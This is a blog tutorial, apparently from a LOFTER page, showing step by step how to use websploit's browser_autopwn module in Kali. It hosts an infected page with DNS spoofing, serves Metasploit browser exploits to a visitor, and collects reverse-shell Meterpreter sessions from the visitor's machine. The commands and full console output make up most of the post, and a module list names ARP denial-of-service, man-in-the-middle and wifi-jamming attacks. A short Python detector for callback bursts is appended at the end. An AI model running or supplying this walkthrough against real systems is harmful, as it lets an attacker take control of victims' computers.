Browser automated attack module: browser autopwn (Method 2)

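This works on the same principle as the previous post; it is just one more approach. It uses websploit in Kali to call the msf module for the attack.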

1. Open websploit

root@kali:~# websploit

WARNING: No route found for IPv6 destination :: (no default route?)


__      __          __                      ___               __
/\ \  __/\ \        /\ \                    /\_ \           __/\ \__
\ \ \/\ \ \ \     __\ \ \____    ____  _____\//\ \     ___ /\_\ \ ,_\
 \ \ \ \ \ \ \  /'__`\ \ '__`\  /',__\/\ '__`\\ \ \   / __`\/\ \ \ \/
  \ \ \_/ \_\ \/\  __/\ \ \L\ \/\__, `\ \ \L\ \\_\ \_/\ \L\ \ \ \ \ \_
   \ `\___x___/\ \____\\ \_,__/\/\____/\ \ ,__//\____\ \____/\ \_\ \__\
    '\/__//__/  \/____/ \/___/  \/___/  \ \ \/ \/____/\/___/  \/_/\/__/
                                         \ \_\
                                          \/_/


--=[WebSploit FrameWork

+---**---==[Version :2.0.5 BETA

+---**---==[Codename :We're Not Crying Wolf

+---**---==[Available Modules : 19

--=[Update Date : [r2.0.5-000 2.3.2014]


wsf > show modules

2. List all modules

wsf > show modules


Web Modules                     Description
----------------------------------------
web/apache_users                Scan Directory Of Apache Users
web/dir_scanner                 Directory Scanner
web/wmap                        Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                         PHPMyAdmin Login Page Scanner
web/cloudflare_resolver         CloudFlare Resolver

Network Modules                 Description
----------------------------------------
network/arp_dos                 ARP Cache Denial Of Service Attack
network/mfod                    Middle Finger Of Doom Attack
network/mitm                    Man In The Middle Attack
network/mlitm                   Man Left In The Middle Attack
network/webkiller               TCP Kill Attack
network/fakeupdate              Fake Update Attack Using DNS Spoof
network/arp_poisoner            Arp Poisoner

Exploit Modules                 Description
----------------------------------------
exploit/autopwn                 Metasploit Autopwn Service
exploit/browser_autopwn         Metasploit Browser Autopwn Service
exploit/java_applet             Java Applet Attack (Using HTML)

Wireless / Bluetooth Modules    Description
----------------------------------------
wifi/wifi_jammer                Wifi Jammer
wifi/wifi_dos                   Wifi Dos Attack
wifi/wifi_honeypot              Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod         Bluetooth Ping Of Death Attack

3. Find the browser_autopwn module and configure its parameters

wsf > use exploit/browser_autopwn

wsf:Browser_Autopwn > show options


Options     Value           RQ      Description
-----------------------------------------
Interface   eth0            yes     Network Interface Name
LHOST       192.168.1.1     yes     Local IP Address


wsf:Browser_Autopwn > set LHOST 192.168.73.128

INTERFACE =>  192.168.73.128

4. Run the attack

wsf:Browser_Autopwn > run

[*]Starting WebServer ... Please Wait ...

[*]Configuration DNS Spoof ... 

[*]Creating Infected Page For Victim ...

[*]Engine Has Been Started.

[!] ************************************************************************

[!] *               The utility msfcli is deprecated!                      *

[!] *            It will be removed on or about 2015-06-18                 *

[!] *              Please use msfconsole -r or -x instead                  *

[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/3802   *

[!] ************************************************************************

[*] Initializing modules...

LHOST => 192.168.73.128

URIPATH => index

[*] Auxiliary module execution completed


[*] Setup

[*] Obfuscating initial javascript 2015-04-23 22:13:34 -0400

[*] Done in 1.020195799 seconds

msf auxiliary(browser_autopwn) > 

[*] Starting exploit modules on host 192.168.73.128...

[*] ---

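As you can see, websploit is now calling the msf module; the automatic processing that follows is the same as running the attack directly from msf.

.................................. (N characters omitted below) .................................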

[*] Starting the payload handler...

[*] Starting handler for java/meterpreter/reverse_tcp on port 7777

[*] Started reverse handler on 192.168.73.128:6666

[*] Starting the payload handler...

[*] Started reverse handler on 192.168.73.128:7777

[*] Starting the payload handler...


[*] --- Done, found 21 exploit modules


[*] Using URL: https://0.0.0.0:8080/index

[*]  Local IP: https://192.168.73.128:8080/index

[*] Server started.

5. Visit the URL given above [https://192.168.73.128:8080/index]

[*] Session ID 1 (192.168.73.128:7777 -> 192.168.73.1:51084) processing InitialAutoRunScript 'migrate -f'

[*] Session ID 2 (192.168.73.128:7777 -> 192.168.73.1:51085) processing InitialAutoRunScript 'migrate -f'

[*] Session ID 3 (192.168.73.128:7777 -> 192.168.73.1:51086) processing InitialAutoRunScript 'migrate -f'


msf auxiliary(browser_autopwn) > sessions


Active sessions

===============


  Id  Type                   Information  Connection

  --  ----                   -----------  ----------

  1   meterpreter java/java  tt @ liuxin  192.168.73.128:7777 -> 192.168.73.1:51084 (192.168.73.1)

  2   meterpreter java/java  tt @ liuxin  192.168.73.128:7777 -> 192.168.73.1:51085 (192.168.73.1)

  3   meterpreter java/java  tt @ liuxin  192.168.73.128:7777 -> 192.168.73.1:51086 (192.168.73.1)

6. Select a session

msf auxiliary(browser_autopwn) > sessions -i 1

[*] Starting interaction with 1...


meterpreter > ipconfig


Interface  1

============

Name         : lo - Software Loopback Interface 1

Hardware MAC : 00:00:00:00:00:00

MTU          : 4294967295

IPv4 Address : 127.0.0.1

IPv4 Netmask : 255.0.0.0

IPv6 Address : ::1

IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
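
From the defender's side, the session list above has a recognisable network shape: one client fetches a page from a host on a web port and, seconds later, opens several connections back to other ports on that same host. The following is an added example, not part of the original post, that flags this pattern in flow records; the record layout, the sample flows, the web-port set and the thresholds are all assumptions chosen for illustration.

```python
from collections import defaultdict

# Constructed flow records (illustrative, not a capture from the post):
# (time in seconds, client IP, server IP, server port)
FLOWS = [
    (0.0, "192.168.73.1", "192.168.73.128", 8080),   # page fetch
    (2.1, "192.168.73.1", "192.168.73.128", 7777),   # callbacks to a second port
    (2.3, "192.168.73.1", "192.168.73.128", 7777),
    (2.6, "192.168.73.1", "192.168.73.128", 7777),
    (1.0, "192.168.73.5", "192.168.73.20", 8080),    # benign: web fetch only
    (50.0, "192.168.73.5", "192.168.73.20", 8443),   # single, late, outside window
]

WEB_PORTS = {80, 443, 8080}   # assumption: ports counted as a page fetch
WINDOW_S = 30.0               # assumption: how soon callbacks must follow
MIN_CALLBACKS = 2             # assumption: connections needed to alert


def find_callback_bursts(flows, web_ports=WEB_PORTS, window=WINDOW_S,
                         min_callbacks=MIN_CALLBACKS):
    """Flag client/server pairs where a page fetch is followed, within
    `window` seconds, by >= min_callbacks connections to non-web ports
    on the same server."""
    by_pair = defaultdict(list)
    for ts, client, server, port in sorted(flows):
        by_pair[(client, server)].append((ts, port))

    alerts = []
    for (client, server), events in by_pair.items():
        fetch_times = [ts for ts, port in events if port in web_ports]
        if not fetch_times:
            continue
        first_fetch = fetch_times[0]
        callbacks = [(ts, port) for ts, port in events
                     if port not in web_ports
                     and first_fetch <= ts <= first_fetch + window]
        if len(callbacks) >= min_callbacks:
            alerts.append({
                "client": client,
                "server": server,
                "callback_ports": sorted({port for _, port in callbacks}),
                "count": len(callbacks),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_callback_bursts(FLOWS):
        print(alert)
```
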


© 走过岁月...... | Powered by LOFTER